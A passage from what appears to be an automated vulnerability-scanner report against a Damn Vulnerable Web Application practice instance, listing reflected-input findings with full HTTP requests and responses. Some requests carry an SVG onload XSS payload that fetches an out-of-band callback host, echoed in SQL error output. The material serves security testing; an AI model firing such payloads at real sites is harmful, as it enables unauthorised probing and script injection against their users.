Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c95e2048051bd733408a78e1357360e6
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:10:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 669
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"><svg/onload=fetch`//aq4ded43l6yyxf89o7zpp255swypmgc44uslfb30\.oastify.com`>'' at line 1 in /var/www/html/vulnerabilities/sqli/source/low.php:11
Stack trace:
#0 /var/www/html/vulnerabilities/sqli/source/low.php(11): mysqli_query(Object(mysqli), 'SELECT first_na...')
#1 /var/ww
...[SNIP]...
29.22. https://pentest-ground.com:4280/vulnerabilities/sqli/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /vulnerabilities/sqli/?id=946146&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowqvtz7zch6z; PHPSESSID=21775aa7d09a4979abf3a2808b744447
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5049
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: Undefined array key "user_token" in <b>/var/www/html/vulnerabilities/sqli/source/impossible.php</b> on line <b>5</b><br />
<br />
<b>Warning</b>: Cannot modify header informat
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=sqli&security=lowqvtz7zch6z&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=sqli&security=lowqvtz7zch6z' )">
...[SNIP]...
29.23. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/ [id parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli_blind/ |
Issue detail
The value of the id request parameter is copied into the application's response.
Request 1
GET /vulnerabilities/sqli_blind/?id='%22%3e%3csvg%2fonload%3dfetch%60%2f%2fzux2i28spv2n14cysw3etr9uwl2eq8e04ovblza%5c.oastify.com%60%3e&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=8a00b829fb85115cd4a5d274b7060971
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:10:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 692
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"><svg/onload=fetch`//zux2i28spv2n14cysw3etr9uwl2eq8e04ovblza\.oastify.com`>'' at line 1 in /var/www/html/vulnerabilities/sqli_blind/source/low.php:12
Stack trace:
#0 /var/www/html/vulnerabilities/sqli_blind/source/low.php(12): mysqli_query(Object(mysqli), 'SELECT first_na...'
...[SNIP]...
29.24. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli_blind/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /vulnerabilities/sqli_blind/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low5mniukk0ac; PHPSESSID=d23daf4c260b8527afd506bf5f9e5077
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:42:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5453
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: Undefined array key "user_token" in <b>/var/www/html/vulnerabilities/sqli_blind/source/impossible.php</b> on line <b>5</b><br />
<br />
<b>Warning</b>: Cannot modify header in
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=sqli_blind&security=low5mniukk0ac&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=sqli_blind&security=low5mniukk0ac' )">
...[SNIP]...
29.25. https://pentest-ground.com:4280/vulnerabilities/upload/ [filename multipart parameter attribute]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/upload/ |
Issue detail
The value of the filename multipart parameter attribute is copied into the application's response.
Request 1
POST /vulnerabilities/upload/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=42a4ada958c0c315d080b17ff8d2a888
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryStVYs604AdB70Lyt
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundaryStVYs604AdB70Lyt
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryStVYs604AdB70Lyt
Content-Disposition: form-data; name="uploaded"; filename="file.txtmby6upbyfc"
Content-Type: text/plain
Wx808VIClA
------WebKitFormBoundaryStVYs604AdB70Lyt
Content-Disposition: form-data; name="Upload"
Upload
------WebKitFormBoundaryStVYs604AdB70Lyt--
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:40:40 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4060
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
<pre>../../hackable/uploads/file.txtmby6upbyfc succesfully uploaded!</pre>
...[SNIP]...
29.26. https://pentest-ground.com:4280/vulnerabilities/upload/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/upload/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
POST /vulnerabilities/upload/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=loworajki7phi; PHPSESSID=c3fe1bc74b5052e630d33195ac436b03
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0NbBo2XreaJ5VlCk
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="uploaded"; fil
...[SNIP]...
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:44:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5057
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: Undefined array key "user_token" in <b>/var/www/html/vulnerabilities/upload/source/impossible.php</b> on line <b>5</b><br />
<br />
<b>Warning</b>: Cannot modify header inform
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=upload&security=loworajki7phi&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=upload&security=loworajki7phi' )">
...[SNIP]...
29.27. https://pentest-ground.com:4280/vulnerabilities/view_help.php [id parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_help.php |
Issue detail
The value of the id request parameter is copied into the application's response.
Request 1
GET /vulnerabilities/view_help.php?id=brute9a8yu412md&security=low&locale=en HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=3a4caf980e8226c982399504aa20892e
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:45:46 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 654
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Help :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
</b>: file_get_contents(../vulnerabilities/brute9a8yu412md/help/help.php): Failed to open stream: No such file or directory in <b>
...[SNIP]...
29.28. https://pentest-ground.com:4280/vulnerabilities/view_help.php [locale parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_help.php |
Issue detail
The value of the locale request parameter is copied into the application's response.
Request 1
GET /vulnerabilities/view_help.php?id=brute&security=low&locale=enarolkscnbg HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=3a4caf980e8226c982399504aa20892e
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:28 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 657
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Help :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
</b>: file_get_contents(../vulnerabilities/brute/help/help.enarolkscnbg.php): Failed to open stream: No such file or directory in <b>
...[SNIP]...
29.29. https://pentest-ground.com:4280/vulnerabilities/view_source.php [id parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Issue detail
The value of the id request parameter is copied into the application's response.
Request 1
GET /vulnerabilities/view_source.php?id=brutepiw8gj782o&security=low HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:27 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 968
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
<h2>vulnerabilities/brutepiw8gj782o/source/low.php</h2>
...[SNIP]...
<input type="button" value="Compare All Levels" onclick="window.location.href='view_source_all.php?id=brutepiw8gj782o'">
...[SNIP]...
29.30. https://pentest-ground.com:4280/vulnerabilities/view_source.php [security parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Issue detail
The value of the security request parameter is copied into the application's response.
Request 1
GET /vulnerabilities/view_source.php?id=brute&security=lowhfz76zhmy5 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:50:27 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 948
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
<h2>vulnerabilities/brute/source/lowhfz76zhmy5.php</h2>
...[SNIP]...
29.31. https://pentest-ground.com:4280/vulnerabilities/weak_id/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/weak_id/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowpxvic51223; PHPSESSID=ef21cca5a5b7e9f24f5235ea0fb84b87
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/weak_id/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:36 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3454
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: dvwaSession=d89631019ba07b88ad8639a10f4d8eb38a32539f; expires=Mon, 21 Oct 2024 10:47:36 GMT; Max-Age=3600; path=/vulnerabilities/weak_id/; domain=pentest-ground.com; secure; HttpOnly
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Weak Session IDs :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=weak_id&security=lowpxvic51223&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=weak_id&security=lowpxvic51223' )">
...[SNIP]...
29.32. https://pentest-ground.com:4280/vulnerabilities/xss_d/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_d/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /vulnerabilities/xss_d/?default=Spanish HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowht1jpauwfz; PHPSESSID=a41b29b87c4b3d8b45a7685b6e4911ec
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:07 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4630
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: DOM Based Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=xss_d&security=lowht1jpauwfz&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=xss_d&security=lowht1jpauwfz' )">
...[SNIP]...
29.33. https://pentest-ground.com:4280/vulnerabilities/xss_r/ [name parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_r/ |
Issue detail
The value of the name request parameter is copied into the application's response.
Request 1
GET /vulnerabilities/xss_r/?name=YIQlvlCg911ae8atf8 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=8541ed0d285b32dcaacfa09899f20c08
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_r/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:39:49 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4251
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Reflected Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
<pre>Hello YIQlvlCg911ae8atf8</pre>
...[SNIP]...
29.34. https://pentest-ground.com:4280/vulnerabilities/xss_r/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_r/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /vulnerabilities/xss_r/?name=YIQlvlCg HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low6c7g0bdmbv; PHPSESSID=8541ed0d285b32dcaacfa09899f20c08
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_r/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5230
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: Undefined array key "user_token" in <b>/var/www/html/vulnerabilities/xss_r/source/impossible.php</b> on line <b>6</b><br />
<br />
<b>Warning</b>: Cannot modify header informa
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=xss_r&security=low6c7g0bdmbv&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=xss_r&security=low6c7g0bdmbv' )">
...[SNIP]...
29.35. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [mtxMessage parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Issue detail
The value of the mtxMessage request parameter is copied into the application's response.
Request 1
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c5fb6727cef2632c9d9a075ed21a483b
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_s/
